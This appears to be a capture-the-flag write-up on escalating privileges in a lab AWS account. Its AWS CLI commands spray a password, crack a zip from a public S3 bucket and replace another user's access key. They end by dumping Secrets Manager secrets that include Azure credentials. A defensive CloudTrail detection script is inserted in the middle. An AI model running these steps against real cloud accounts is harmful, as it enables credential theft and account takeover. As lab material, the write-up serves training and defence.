Jaeger

Solve

Note that the lambda function contains an access key ID.

With the access key ID, we are able to enumerate the username that owns the access key.

aws iam get-access-key-last-used --access-key-id AKIA6GBMFYWSLBLJMVSE

With the new username, let's spray the passwords against this new user to see if we are able to authenticate.

Macie is also a reference to Amazon Macie, which identifies sensitive data in the AWS instances. With the macie user's credentials, we can look for sensitive information or read existing reports through Amazon Macie to try to escalate our privileges.

Amazon Macie Dashboard

Looking at the Summary Dashboard, there are 6 buckets being scanned, of which 3 are publicly accessible.

Listing public read access bucket

We enumerated the it-storage bucket previously, so let's look into the other 2 buckets.

Listing of files in the contractor-install-tmp-52364 bucket

It seems that the contractor bucket holds a file with an access key, so let's try to download it.

aws s3 cp s3://contractor-install-tmp-52364/ext-contractor_accessKeys_24534.zip . --no-sign-request

When attempting to unzip the file, it asks for a password.

We are able to use zip2john along with our existing password wordlist to crack the file.

Cracking the password

The zip file contains an AWS Access Key ID and AWS Secret Access Key. We are able to authenticate with them and run get-caller-identity as a sanity check that the key is still working.

Next, I will enumerate the IAM policy of the user to see if we have any interesting permissions.

aws iam list-user-policies --user-name ext-contractor --profile external
aws iam get-user-policy --user-name ext-contractor --policy-name contractor_policy --profile external

It seems that the ext-contractor user has permission to create, list and delete access keys for the backup user. Let's try to create a new access key.

aws iam list-access-keys --user-name backup-user --profile external

Each IAM user can only have 2 active access keys, so let's delete one of the current access keys and create another one.

aws iam delete-access-key --user-name backup-user --access-key-id AKIA6GBMFYWSKHOQDV6X --profile external
aws iam create-access-key --user-name backup-user --profile external
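
The delete-then-create sequence above is visible in CloudTrail as IAM events whose caller differs from the target user. The following is an added detection example, not part of the original writeup: the records are constructed and trimmed to the fields used, and the helper names and 15-minute window are assumptions.

```python
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=15)  # assumed correlation window, tune per environment

def make_event(time, name, actor, target=None, error=None):
    """Build a constructed CloudTrail-style record with only the fields used below."""
    rec = {"eventTime": time, "eventSource": "iam.amazonaws.com", "eventName": name,
           "userIdentity": {"type": "IAMUser", "userName": actor},
           "requestParameters": {"userName": target} if target else None}
    if error:
        rec["errorCode"] = error
    return rec

# Constructed sample data, not captured from the lab account.
SAMPLE_EVENTS = [
    make_event("2024-01-01T10:00:00Z", "ListAccessKeys", "ext-contractor", "backup-user"),
    make_event("2024-01-01T10:01:00Z", "DeleteAccessKey", "ext-contractor", "backup-user"),
    make_event("2024-01-01T10:02:00Z", "CreateAccessKey", "ext-contractor", "backup-user"),
    make_event("2024-01-01T11:00:00Z", "CreateAccessKey", "alice"),  # self-service rotation
    make_event("2024-01-01T12:00:00Z", "CreateAccessKey", "bob", "alice", error="AccessDenied"),
]

def _ts(event):
    return datetime.strptime(event["eventTime"], "%Y-%m-%dT%H:%M:%SZ")

def _target(event):
    # requestParameters.userName is omitted when a user acts on their own keys.
    params = event.get("requestParameters") or {}
    return params.get("userName") or event["userIdentity"].get("userName")

def find_cross_user_key_creation(events, window=WINDOW):
    """Flag successful CreateAccessKey calls made for a different IAM user.
    Severity is high when the same caller deleted a key of that user just before."""
    findings, last_delete = [], {}
    for ev in sorted(events, key=_ts):
        if ev.get("eventSource") != "iam.amazonaws.com" or ev.get("errorCode"):
            continue  # ignore other services and failed calls
        ident = ev["userIdentity"]
        actor = ident.get("userName") or ident.get("arn")  # roles carry no userName
        target = _target(ev)
        if actor == target:
            continue
        if ev["eventName"] == "DeleteAccessKey":
            last_delete[(actor, target)] = _ts(ev)
        elif ev["eventName"] == "CreateAccessKey":
            freed = last_delete.get((actor, target))
            swapped = freed is not None and _ts(ev) - freed <= window
            findings.append({"time": ev["eventTime"], "actor": actor, "target": target,
                             "severity": "high" if swapped else "medium"})
    return findings
```

Run over the sample, only the ext-contractor call against backup-user is reported; the self-service rotation and the denied call are ignored.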

Let's run get-caller-identity again as a sanity check that the credentials are working properly.

Next, I'll be using the tool bf-aws-permissions to brute-force the user's permissions.

./bf-aws-permissions.sh -p backup -r us-east-1
output of bf-aws-permissions.sh

It seems that the backup-user has permissions over secretsmanager and elastic beanstalk, so let's enumerate those accordingly.

aws secretsmanager list-secrets

Looking at the secretsmanager output, there are 2 secrets:

  • Flag

  • azure-integration credentials

Let's dump out both secrets.

aws secretsmanager describe-secret --secret-id flag --profile backup
aws secretsmanager get-secret-value --secret-id flag --profile backup
aws secretsmanager describe-secret --secret-id azure-integration --profile backup
aws secretsmanager get-secret-value --secret-id azure-integration --profile backup

TLDR

  • Use get-access-key-last-used to get the username of the access key from lambda

  • Spray the macie-user-467 user with password wordlist

  • Enumerate Amazon Macie to identify public buckets with files

  • Download contractor-install-tmp-52364/ext-contractor_accessKeys_24534.zip file

  • Crack the password with zip2john and john

  • Authenticate as the ext-contractor user and enumerate IAM

  • Use CreateAccessKey to create a new access key for the backup-user

  • Brute-force backup-user permissions with the bf-aws-permissions script

  • Enumerate secretsmanager to get the flag as well as credentials for the azintegration user
